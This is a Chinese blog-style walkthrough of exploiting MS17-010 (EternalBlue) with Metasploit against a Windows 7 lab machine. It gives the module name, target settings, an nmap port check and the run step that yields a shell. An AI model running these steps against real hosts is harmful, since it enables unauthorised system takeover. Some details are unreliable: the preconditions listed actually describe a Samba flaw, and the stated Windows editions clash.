欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

永恒之蓝windows7 下的渗透测试

程序员文章站 2022-05-26 08:39:01
...

漏洞介绍

永恒之蓝是影子经纪人黑客组织攻破美国NSA黑客组织后公布的漏洞工具之一。

2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和*机构专网中招,被勒索支付高额赎金才能解密恢复文件。

代号 MS17-010

window版本为(windowsxp-windows server20012)
这里的测试版为windows7 企业版,运用工具msf,namp.
测试攻击机为kali linux ,测试机为windows7 旗舰版
linux版本下还没测试,稍后补上。

实现条件

  • 部署了存在漏洞的samba协议的版本,并对外开启445端口
  • 匿名访问用户对文件有可读权限
  • 需要知道共享目录的物理漏洞

过程如下

首先打开kali下的msfconsole

msfconsole

永恒之蓝windows7 下的渗透测试

search 17-010

可能会出现如下的情况

Module database cache not built yet, using slow search

执行如下三条命令

aaa@qq.com:~# service postgresql start

aaa@qq.com:~# msfdb init

msf > db_rebuild_cache

我们使用下面的ms17_010_eternalblue
永恒之蓝windows7 下的渗透测试

msf>use exploit/windows/smb/ms17_010_eternalblue

永恒之蓝windows7 下的渗透测试
亲测上面的smb_ms17_010 拿不到shell

查看下命令的参数

show options

永恒之蓝windows7 下的渗透测试
查看到必须配置的参数为主机名称,和主机开放445 端口,可以用nmap扫描目标是否开放了445端口


nmap 192.168.28.131 -p 445

永恒之蓝windows7 下的渗透测试
可以看到,端口开放,可以测试主机

set RHOST 192.168.28.131

永恒之蓝windows7 下的渗透测试
再次查看参数,主机已经添加成功
永恒之蓝windows7 下的渗透测试

开始测试

run

永恒之蓝windows7 下的渗透测试
成功拿到shell,为所欲为
永恒之蓝windows7 下的渗透测试
由于linux下使用utf-8编码,而windows使用的是gbk,所以,我们对kali设置语言编码

export LANG=zh_CN.GBK

重启kali.

相关标签: 漏洞测试